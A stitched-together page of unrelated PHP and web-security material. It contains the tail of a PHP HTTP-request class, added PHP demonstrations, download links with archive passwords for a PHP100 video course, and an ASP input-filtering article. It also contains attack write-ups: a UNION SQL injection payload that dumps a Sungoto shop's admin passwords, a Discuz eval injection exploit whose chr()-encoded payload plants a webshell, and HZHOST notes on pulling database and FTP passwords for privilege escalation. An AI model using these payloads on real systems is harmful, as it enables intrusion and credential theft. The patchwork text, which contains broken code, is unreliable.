$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(emptyempty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(emptyempty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
// ereg() was removed in PHP 7; preg_match() does the same job
if(!preg_match('#^http://#i',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
// validate before use: the original read $urlarr['path'] and only then checked it
if(!isset($urlarr['host']) or !isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No host or path specified");
$this->port = !empty($urlarr['port']) ? (int)$urlarr['port'] : 80;
if($this->port < 1 or $this->port > 65535)
die("Error: Invalid port number");
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->host = $urlarr['host'];
if($this->port != 80)
$this->host .= ':'.$this->port;
// directory part of the path, used to resolve relative Location headers
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/^(location|content-location|uri): (.*)$/im',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(strpos($this->last_redirection,'://') !== false)
return $this->get($this->last_redirection);
elseif(substr($this->last_redirection,0,1) == '/')
// absolute path: resolve against the host root, not the current directory
return $this->get('http://'.$this->host.$this->last_redirection);
else
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array('');
break;
case 'cookie':
$this->cookie = array('');
break;
default:
$this->cookiejar = '';
$this->header = array('');
$this->cookie = array('');
$this->allowredirection = '';
break;
}
}
}
?>
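A worked example of what getheader(), getcontent() and getcookie() do with a server response, added here and not part of the class above: it parses a constructed raw response (the sample is made up, not captured from any server) on the first blank line only, keeps repeated Set-Cookie headers, extracts just the name=value pair from each one, including a value that itself contains '=', an Expires attribute with a comma, and a cookie with no attributes at all, and rebuilds the Cookie request header the cookie jar would send next. All function names are the example's own.

```php
<?php
// Added example: raw HTTP response -> headers, body and cookie jar.
// Not code from the HTTP class on this page.

function parse_response(string $raw): array
{
    // Split on the FIRST blank line only; splitting on every "\r\n\r\n"
    // and re-joining the pieces damages any body that contains a blank line.
    $parts  = explode("\r\n\r\n", $raw, 2);
    $lines  = explode("\r\n", $parts[0]);
    $status = array_shift($lines);
    $headers = [];
    foreach ($lines as $line) {
        if (strpos($line, ':') === false) {
            continue;                       // not a header line
        }
        [$name, $value] = explode(':', $line, 2);
        // headers may repeat (Set-Cookie does), so keep a list per name
        $headers[strtolower(trim($name))][] = trim($value);
    }
    return ['status' => $status, 'headers' => $headers, 'body' => $parts[1] ?? ''];
}

function cookies_from(array $headers): array
{
    $jar = [];
    foreach ($headers['set-cookie'] ?? [] as $sc) {
        // value = everything between the first '=' and the first ';' (or end of line);
        // attributes such as Path, Expires and HttpOnly are not part of the value
        if (preg_match('/^([^=;]+)=([^;]*)/', $sc, $m)) {
            $jar[trim($m[1])] = trim($m[2]);
        }
    }
    return $jar;
}

function cookie_header(array $jar): string
{
    $pairs = [];
    foreach ($jar as $name => $value) {
        $pairs[] = $name . '=' . $value;
    }
    return 'Cookie: ' . implode('; ', $pairs);
}

// Constructed sample response; the cookie names and body are invented for the demo.
$raw = "HTTP/1.1 200 OK\r\n"
     . "Content-Type: text/html\r\n"
     . "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly\r\n"
     . "Set-Cookie: lang=en\r\n"
     . "Set-Cookie: track=a=b; expires=Thu, 01 Jan 2026 00:00:00 GMT; path=/\r\n"
     . "\r\n"
     . "<html>\r\n\r\n<body>the blank line above must survive</body></html>";

$resp = parse_response($raw);
$jar  = cookies_from($resp['headers']);

echo $resp['status'], "\n";
echo cookie_header($jar), "\n";
echo strlen($resp['body']), " body bytes\n";
```

The regex deliberately stops at the first ';' rather than the first ','. Expires attributes contain a comma, so a client that merges or splits Set-Cookie headers on commas (as some naive parsers do) truncates them; splitting on lines first avoids that.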
PHP100 video tutorial downloads (full set, with extraction passwords), updated through lesson 97
Original URL list:
http://wt6.php100.com/php100-1.rar
http://wt6.php100.com/php100-2.rar
http://wt6.php100.com/php100-3.rar
http://wt6.php100.com/php100-4.rar
http://wt6.php100.com/php100-5.rar
http://wt6.php100.com/php100-6.rar
http://wt6.php100.com/php100-7.rar
http://wt6.php100.com/php100-8.rar
http://wt6.php100.com/php100-9.rar
http://wt6.php100.com/php100-10.rar
http://wt6.php100.com/php100-11.rar
http://wt6.php100.com/php100-12.rar
http://wt6.php100.com/php100-13.rar
http://wt6.php100.com/php100-14.rar
http://wt6.php100.com/php100-15.rar
http://wt6.php100.com/php100-16.rar
http://wt6.php100.com/php100-17.rar
http://wt6.php100.com/php100-18.rar
http://wt6.php100.com/php100-19.rar
http://wt6.php100.com/php100-20.rar
http://wt6.php100.com/php100-21.rar
http://wt6.php100.com/php100-22.rar
http://wt6.php100.com/php100-23.rar
http://wt6.php100.com/php100-24.rar
http://wt6.php100.com/php100-25.rar
http://wt6.php100.com/php100-26.rar
http://wt6.php100.com/php100-27.rar
http://wt6.php100.com/php100-28.rar
http://wt6.php100.com/php100-29.rar
http://wt6.php100.com/php100-30.rar
http://wt6.php100.com/php100-31.rar
http://wt6.php100.com/php100-32.rar
http://wt6.php100.com/php100-33.rar
http://wt6.php100.com/php100-34.rar
http://wt6.php100.com/php100-35.rar
http://wt6.php100.com/php100-36.rar
http://wt6.php100.com/php100-37.rar
http://wt6.php100.com/php100-38.rar
http://wt6.php100.com/php100-39.rar
http://wt6.php100.com/php100-40_c.rar
http://wt6.php100.com/09/php100-41_u.rar
http://wt6.php100.com/09/php100-42_m.rar
http://wt6.php100.com/09/php100-43.rar
http://wt6.php100.com/09/php100-44.rar
http://wt6.php100.com/09/php100-45.rar
http://wt6.php100.com/09/php100-46.rar
http://wt6.php100.com/09/php100-47_s.rar
http://wt6.php100.com/09/php100-48_i.rar
http://wt6.php100.com/09/php100-49_s.rar
http://wt6.php100.com/09/php100-50_e.rar
http://wt6.php100.com/09/php100-51_m.rar
http://wt6.php100.com/09/php100-52_h.rar
http://wt6.php100.com/09/php100-53_o.rar
http://wt6.php100.com//09/php100-54_.rar
http://wt6.php100.com/09/php100-55_j.rar
http://wt6.php100.com/09/php100-56_n.rar
http://wt6.php100.com/09/php100-57_s.rar
http://wt6.php100.com/09/php100-58_d.rar
http://wt6.php100.com/09/php100-59_a.rar
http://wt6.php100.com/09/php100-60.rar
http://wt6.php100.com//09/php100-61_!.rar
http://wt6.php100.com//09/php100-62_u.rar
http://wt6.php100.com/09/php100-63-1_x.rar
http://wt6.php100.com/09/php100-64.rar
http://wt6.php100.com/09/php100-65_ss.rar
http://wt6.php100.com/09/php100-66_p.rar
http://wt6.php100.com/09/php100-67_o.rar
http://wt6.php100.com/09/php100-68_m.rar
http://wt6.php100.com/09/php100-69_d.rar
http://wt6.php100.com//10/php100-70.rar
http://wt6.php100.com//10/php100-71_s.rar
http://wt6.php100.com/10/php100-72_x.rar
http://wt6.php100.com/10/php100-73_h.rar
http://wt6.php100.com/10/php100-74_z.rar
http://wt6.php100.com/10/php100-75-vip.rar extraction password: php100-18293-2938-2839-348-#
http://wt6.php100.com/10/php100-76_u.rar extraction password: php100-18634-6254-1001-283-#
http://wt6.php100.com/10/php100-77_p.zip extraction password: php100-18394-9384-2333-314-#
http://wt6.php100.com//10/php100-78.zip extraction password: php100-28323-5837-2734-392-#
http://wt6.php100.com/10/php100-79_u.zip extraction password: php100-83343-5234-8849-122-#
http://wt6.php100.com/10/php100-80_s.zip extraction password: php100-18622-5751-1311-233-#
http://wt6.php100.com/10/php100-81.zip (apparently no password was set)
http://wt6.php100.com/10/php100-82.rar extraction password: php100-18028-4321-1202-942-#
http://wt6.php100.com/10/php1000-83.rar extraction password: php100-18942-3321-1232-010-#
http://wt6.php100.com/10/php10000-84.rar extraction password: php100-18823-3333-1322-842-#
http://wt6.php100.com/10/php100-85.rar extraction password: php100-00000-0000-0000-000-#
http://down3.php100.com:81/php100/10/php100-86.rar extraction password: php100-18837-3847-7576-624-#
http://down3.php100.com:81/php100/10/php100-87.rar extraction password: php100-19746-3293-2273-929-#
http://down3.php100.com:81/php100/10/88.rar extraction password: php100-17374-3828-4877-183-#
From lesson 89 on, the extraction password is php100.com
http://down3.php100.com:81/php100/10/php100-89.rar
http://down3.php100.com:81/php100/10/php100-90.rar
http://down3.php100.com:81/php100/10/php100-91.rar
http://down3.php100.com:81/php100/10/php100-92.rar
http://down3.php100.com:81/php100/10/php100-93.rar
http://dx.php100.com:83/10/php100-94.rar
http://dx.php100.com:83/10/php100-95-.rar
http://dx.php100.com:190/10/php100-96.rar
http://dx.php100.com:190/10/php100-97.rar
PHP100 video tutorial 1: Environment setup and code debugging
PHP100 video tutorial 2: PHP data types and source debugging
PHP100 video tutorial 3: Common PHP operators: introduction and use
PHP100 video tutorial 4: PHP conditional statements: introduction and use
PHP100 video tutorial 5: PHP loop statements: introduction and use
PHP100 video tutorial 6: Creating, modifying and using PHP arrays
PHP100 video tutorial 7: PHP functions and user-defined functions
PHP100 video tutorial 8: MySQL introduction and creating a new database
PHP100 video tutorial 9: Common SQL statements
PHP100 video tutorial 10: Using MySQL from PHP5
PHP100 video tutorial 11: Building a PHP+MySQL guestbook (part 1)
PHP100 video tutorial 12: Building a PHP+MySQL guestbook (part 2)
PHP100 video tutorial 13: PHP+MySQL pagination
PHP100 video tutorial 14: PHP file upload: principles and use
PHP100 video tutorial 15: Generating static HTML files from PHP
PHP100 video tutorial 16: PHP "thief" (content scraper) programs: principles and an example
PHP100 video tutorial 17: PHP object-oriented development (1)
PHP100 video tutorial 18: PHP object-oriented development (2)
PHP100 video tutorial 19: PHP object-oriented development (3)
PHP100 video tutorial 20: PHP object-oriented development (4)
PHP100 video tutorial 21: PHP object-oriented development (5)
PHP100 video tutorial 22: PHP object-oriented development (6)
PHP100 video tutorial 23: PHP object-oriented development (7)
PHP100 video tutorial 24: PHP object-oriented development (8)
PHP100 video tutorial 25: PHP object-oriented development (9)
PHP100 video tutorial 26: Writing your own PHP+MySQL class
PHP100 video tutorial 27: Smarty template engine: getting started
PHP100 video tutorial 28: Smarty template engine: variable modifiers
PHP100 video tutorial 29: Smarty template engine: built-in functions
PHP100 video tutorial 30: Smarty template engine: caching
PHP100 video tutorial 31: Using the FCKeditor online editor with PHP
PHP100 video tutorial 32: Cookies and sessions in PHP5 explained
PHP100 video tutorial 33: Building image CAPTCHAs in PHP5 (part 1)
PHP100 video tutorial 34: Chinese-character image CAPTCHAs in PHP5 (part 2)
PHP100 video tutorial 35: Text and image watermarks and thumbnails in PHP5
PHP100 video tutorial 36: Regular expressions in PHP (1)
PHP100 video tutorial 37: Regular expressions in PHP (2)
PHP100 video tutorial 38: Regular expressions in PHP (3)
PHP100 video tutorial 39: Regular expressions in PHP (4)
PHP100 video tutorial 40: Writing your own UBB code parser in PHP
PHP100 video tutorial 41: Site search in PHP: multiple keywords and highlighting
PHP100 video tutorial 42: Sending mail from PHP with mail() or sockets
PHP100 video tutorial 43: MVC in PHP with ThinkPHP (part 1)
PHP100 video tutorial 44: MVC in PHP with ThinkPHP (part 2)
PHP100 video tutorial 45: How to build a complete website in PHP
PHP100 video tutorial 46: phpMyAdmin features explained
PHP100 video tutorial 47: Two simple ways to output CSV and Excel from PHP
PHP100 video tutorial 48: Ajax+PHP quick start and use
PHP100 video tutorial 49: Ajax+PHP waiting progress bar effect (2)
PHP100 video tutorial 50: Ajax+PHP username or e-mail availability check (3)
PHP100 video tutorial 51: Developing a PHP+MySQL membership system (part 1)
PHP100 video tutorial 52: Developing a PHP+MySQL membership system (part 2)
PHP100 video tutorial 53: Preventing injection and secure PHP development
PHP100 video tutorial 54: Apache rewrite configuration for pseudo-static URLs
PHP100 video tutorial 55: Connecting to databases with PDO in PHP5
PHP100 video tutorial 56: Principles and steps for writing a PHP installer
PHP100 video tutorial 57: Backing up a database from PHP: principles and methods
PHP100 video tutorial 58: Quickly building a corporate site with BIWEB
PHP100 video tutorial 59: BIWEB common questions and structure analysis
PHP100 video tutorial 60: PHP and database coding standards
PHP100 video tutorial 61: Developing a PHP+MySQL news system (1)
PHP100 video tutorial 62: Developing a PHP+MySQL news system (2)
PHP100 video tutorial 63: Developing a PHP+MySQL news system (3, part 1)
PHP100 video tutorial 64: Developing a PHP+MySQL news system (4)
PHP100 video tutorial 65: Developing a PHP+MySQL news system (5)
PHP100 video tutorial 66: Developing a PHP+MySQL news system (6)
PHP100 video tutorial 67: Developing a PHP+MySQL news system (7)
PHP100 video tutorial 68: Developing a PHP+MySQL news system (8)
PHP100 video tutorial 69: Developing a PHP+MySQL news system (9)
PHP100 video tutorial 70: PHP 5.3.1 + Apache + MySQL configuration
PHP100 video tutorial 71: Using and configuring SQLite with PHP
PHP100 video tutorial 72: PHP+SQLite common functions and use
PHP100 video tutorial 73: PHP Memcached advanced caching: configuration
PHP100 video tutorial 74: PHP Memcached advanced caching: use
PHP100 video tutorial 75: Zend Framework setup and debugging
PHP100 video tutorial 76: Zend Framework database operations: reading and inserting
PHP100 video tutorial 77: Zend Framework database operations: editing and view helpers
PHP100 video tutorial 78: PHP+Flash multi-file asynchronous upload with SWFUpload
PHP100 video tutorial 79: Uploading RAR archives and extracting them to a directory with PHP
PHP100 video tutorial 80: ADOdb universal database class for PHP (part 1)
PHP100 video tutorial 81: ADOdb universal database class for PHP (part 2)
PHP100 video tutorial 82: Developing a generic scrape-and-store program in PHP (1)
PHP100 video tutorial 83: Developing a generic scrape-and-store program in PHP (2)
PHP100 video tutorial 84: Developing a generic scrape-and-store program in PHP (3)
PHP100 video tutorial 85: JpGraph charting library for PHP: setup and use
PHP100 video tutorial 86: JpGraph Chinese fonts and background settings
PHP100 video tutorial 87: cURL in PHP: transfer and fetch
PHP100 video tutorial 88: Simulating a login and fetching data with cURL in PHP
PHP100 video tutorial 89: Reading XML in PHP with DOMDocument
PHP100 video tutorial 90: Creating XML files with PHP DOM
PHP100 video tutorial 91: Modifying and deleting XML content in PHP
PHP100 video tutorial 92: Online payment interfaces: Alipay (支付宝) integration in PHP
PHP100 video tutorial 93: Online payment interfaces: Yunwang (云网) integration in PHP
PHP100 video tutorial 94: SVN (Subversion) setup, installation and debugging
PHP100 video tutorial 95: SVN (Subversion) usage and tips
PHP100 video tutorial 96: Classic PHP interview and written-test questions explained (part 1)
PHP100 video tutorial 97: Classic PHP interview and written-test questions explained (part 2)
Thanks to php100 for providing such an excellent resource.
A very good PHP resource, shared here.
Perfect filtering of unwanted parameters in ASP: IsNumeric
Source: 闽南黑客基地 http://www.123yc.com (everyone is welcome to join)
Author: FISH
Today I'll show a more complete filtering method, using the IsNumeric() function from Microsoft's VBScript. Without further ado,
here are its description and usage:
IsNumeric function: description
Returns a Boolean value indicating whether the expression evaluates to a number.
Syntax
IsNumeric(expression)
The expression argument can be any expression.
Remarks
IsNumeric returns True if the entire expression is recognized as a number;
otherwise it returns False.
If expression is a date expression, IsNumeric returns False.
Clear so far?
IsNumeric() tests the expression in the parentheses and returns True if it is a number and False if it is not. On that basis we can write
if not isnumeric(request.querystring("id")) then response.redirect "index.asp"
By the same token you can put whatever you want after Then; if you put something else there, remember to add
response.end
to stop processing.
To spell the line out: if the id parameter in the address bar is not a number, the statement after Then runs.
That is where the gate is, which is why I call it "perfect filtering" (perfect for parameters that are supposed to be numeric, that is; it does nothing for parameters that legitimately carry text).
When we test for a vulnerability we normally append special characters to id to get what we want, and this function is the nemesis of that:
append a ', a ;, a , or " and 1=1" and so on,
and id is no longer numeric, so the statement after Then runs
and the filtering goal is achieved.
====================================
For purely numeric values nothing beats the scripting language's own functions:
in ASP, CInt, CLng and IsNumeric give about the strictest filtering there is; in PHP, intval() (note that intval() coerces rather than validates: it silently turns "5 union select" into 5, which keeps the query safe but hides the tampering).
Where "<" and ">" cannot be filtered out, the defence against cross-site scripting is to convert every angle bracket to its HTML entity: "<" becomes "&lt;" and ">" becomes "&gt;". Note that all of the input filtering above must happen on the server side; any validation done in the client is wasted effort and is trivially bypassed.
Sungoto (商达讯) web-shop system, Taobao/Paipai branch edition: SQL injection
Author: Lan3a
Official site: http://www.sungoto.com/
I feel the program is copied from somewhere, but I can't say from which one.
Skimming the code, I found that every variable is passed through the function below for checking.
Looking closer, this is what it does:
Function SafeRequest(ParaName, ParaType)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "<center>参数" & ParaName & "必须为数字型,请正确操作!</center>"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
(Type 1 parameters must be numeric; everything else only has single quotes doubled.)
From then on I skipped everything that went through SafeRequest().
That is how I found vworder.asp, where the variable is passed to the query without any check at all:
goods=request.form("searchkey")
set rs=server.CreateObject("adodb.recordset")
rs.open "select id,name,price1,score,price2,vipprice,actiondate,UserSex,realname,receipt,goods,postcode,comments,comment,remarks,paymethord,deliverymethord,state,paid,priced,useremail,usertel,address,productnum from orders where goods='"&goods&"' ",conn,1,1
if rs.eof and rs.bof then
response.write "<center>查无此订单!</center>"
response.End
end if
%>
Since it is submitted by POST, go to the searchorder.asp page
and enter in the order-number field:
1' and 1=2 union select 1,2,3,4,5,6,userpassword,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22,23,24 from admin where ''='
The query selects 24 columns, so the UNION must supply 24 as well; the admin username and password are then dumped in the columns that are rendered on the page. Tested against the official site:
Finally I found that every program on the official site has this bug, though the query has to be adjusted for each one to get the password out.
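The two patterns above, the SafeRequest() check and the unchecked vworder.asp query, ported to PHP as an added example (not Sungoto's code, not from either post), run against an in-memory SQLite database so the injection can be reproduced offline. It also puts numbers behind the IsNumeric/intval advice in the ASP filtering section above: the numeric branch uses FILTER_VALIDATE_INT, which is stricter than PHP's is_numeric(), and the string branch binds the value instead of doubling quotes. Assumptions: the pdo_sqlite extension is available, the orders table is cut down to three columns, and the rows are constructed sample data.

```php
<?php
// Added example (PHP + SQLite); not the Sungoto code base and not from the original post.

function build_db(): PDO
{
    $db = new PDO('sqlite::memory:');                       // assumption: pdo_sqlite is loaded
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE orders (id INTEGER, goods TEXT, realname TEXT)');
    $db->exec('CREATE TABLE admin (admin TEXT, userpassword TEXT)');
    $db->exec("INSERT INTO orders VALUES (1, 'ORD-1001', 'alice')");      // constructed rows
    $db->exec("INSERT INTO admin  VALUES ('admin', 's3cr3t-hash')");
    return $db;
}

// vworder.asp pattern: the search key is concatenated straight into the SQL text.
function find_order_vulnerable(PDO $db, string $goods): array
{
    $sql = "select id,goods,realname from orders where goods='" . $goods . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// SafeRequest pattern done properly. Type 1 = numeric: validate as an integer
// (FILTER_VALIDATE_INT rejects "1e3", "0.5" and "42 or 1=1", all of which is_numeric()
// or intval() would let through in some form). Any other type = string: return it as
// data and let the query bind it; no quote doubling.
function safe_request($value, int $type)
{
    if ($type === 1) {
        $n = filter_var($value, FILTER_VALIDATE_INT);
        if ($n === false) {
            throw new InvalidArgumentException('parameter must be numeric');
        }
        return $n;
    }
    return (string)$value;
}

function find_order_safe(PDO $db, string $goods): array
{
    $stmt = $db->prepare('select id,goods,realname from orders where goods = :goods');
    $stmt->execute([':goods' => safe_request($goods, 0)]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = build_db();

// The page's payload, cut down to this table's three columns.
$payload = "1' and 1=2 union select 1,userpassword,admin from admin where ''='";

echo "vulnerable query:\n";
print_r(find_order_vulnerable($db, $payload));   // the admin row arrives via the UNION
echo "bound parameter:\n";
print_r(find_order_safe($db, $payload));         // empty: the payload is just a string value

echo "numeric validation:\n";
foreach (['42', '42 or 1=1', '1e3', "1' or '1'='1"] as $id) {
    try {
        printf("%-14s -> %d\n", $id, safe_request($id, 1));
    } catch (InvalidArgumentException $e) {
        printf("%-14s -> rejected\n", $id);
    }
}
```

Doubling single quotes, as SafeRequest() does for string parameters, only helps inside a quoted SQL literal; it does nothing for a value that lands in a numeric context or after ORDER BY, and it is exactly the check vworder.asp forgot to call. Binding the parameter removes the question of which context the value ends up in.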
Discuz: code execution by a non-founder administrator
global.func.php
function sendpm($toid, $subject, $message, $fromid = '') {
    if ($fromid === '') {
        require_once DISCUZ_ROOT.'./uc_client/client.php';
        $fromid = $discuz_uid;
    }
    if ($fromid) {
        uc_pm_send($fromid, $toid, $subject, $message);
    } else {
        global $promptkeys;
        if (in_array($subject, $promptkeys)) {
            $type = $subject;
        } else {
            extract($GLOBALS, EXTR_SKIP);
            require_once DISCUZ_ROOT.'./include/discuzcode.func.php';
            eval("\$message = addslashes(\"".$message."\");");   // no filtering: $message is spliced into PHP source
            $type = 'systempm';
            $message = '<div>'.$subject.' {time}'.discuzcode($message, 1, 0).'</div>';
        }
        sendnotice($toid, $message, $type);
    }
}
When $fromid is empty and the subject is not one of $promptkeys, the message text is pasted into a double-quoted PHP string literal and that source is eval()'d. PHP evaluates {${expr}} inside a double-quoted string, so expr runs as code; the form needs no quotes or backslashes, which is why it survives quote-escaping of the input.
POC:
1. admincp.php?frames=yes&action=members&operation=newsletter
2. Send a PM with the notification content set to: {${phpinfo()}}
EXP (the chr() chain below decodes to fputs(fopen('forumdata/cache/cache_01.php','w'),'<?php eval($_POST[cmd])?>'); i.e. it drops a one-line webshell into the cache directory):
${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
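A self-contained demonstration of why that eval() line executes attacker text, added here and not taken from Discuz: the vulnerable function repeats the sendpm() construct verbatim, the safe one does what the line was meant to do, and a harmless marker() function stands in for the phpinfo()/fputs() calls in the PoC so the only visible effect is a counter. Function names, the second breakout payload and the counter are the example's own.

```php
<?php
// Added example (not Discuz code): user text spliced into a double-quoted literal inside eval().
// {${expr}} raises an undefined-variable warning (and, from PHP 8.2, a deprecation notice)
// after running expr; silence those so the output shows only what matters.
error_reporting(E_ALL & ~E_WARNING & ~E_NOTICE & ~E_DEPRECATED);

$GLOBALS['marker_calls'] = 0;

function marker(): string
{
    $GLOBALS['marker_calls']++;       // stands in for phpinfo() / fputs() in the PoC
    return '';
}

// Same construct as sendpm(): the message becomes part of the PHP source that eval() compiles.
function format_vulnerable(string $message): string
{
    eval("\$message = addslashes(\"" . $message . "\");");
    return $message;
}

// What the line was supposed to do: a plain function call on the value. No eval, no interpolation.
function format_safe(string $message): string
{
    return addslashes($message);
}

$payloads = [
    'curly syntax (no quotes, no backslashes)' => '{${marker()}}',
    'string breakout (needs a quote)'          => '"); marker(); //',
];

foreach ($payloads as $label => $payload) {
    foreach (['format_vulnerable', 'format_safe'] as $fn) {
        $GLOBALS['marker_calls'] = 0;
        $out = $fn($payload);
        printf("%-18s %-42s marker() ran %d time(s), result=%s\n",
               $fn, $label, $GLOBALS['marker_calls'], var_export($out, true));
    }
}
```

The first payload is the one the PoC uses: {${marker()}} is PHP's variable-variable interpolation, so marker() is called to produce a variable name and its return value is discarded, which is why the PoC can call arbitrary functions without a single quote character. The second payload shows the same eval() is also reachable by closing the string literal, which only works if the input is not quote-escaped first. format_safe() is immune to both because the message is never compiled.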
HZHOST virtual hosting: further use during privilege escalation
1. c:\windows\temp contains FTP login records left behind by the hzhost panel, with username and password.
2. Using hzhost to get the highest privileges on the host.
On a host with hzhost installed, the MSSQL sa password, the MySQL root password and the Serv-U administrator password are all stored in the registry, at
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass
encrypted with hzhost's own scheme, as strings like eLVClO4tzsKBf#dee52443a3872cc159
But the hzhost backend can turn them back into plaintext! With the sa or root password in hand, the highest privileges are within reach. If w.s is disabled, just upload an aspx shell instead.
After uploading an asp shell, the database connection string can be read from incs\constr.asp. Connect to the database and run
SELECT * FROM [hstlst] to list the hosting accounts.
The h_ftppass values look much like hzhost's own encrypted strings. Right: the hosting-account passwords are encrypted with the same scheme, yet the hosting-management page
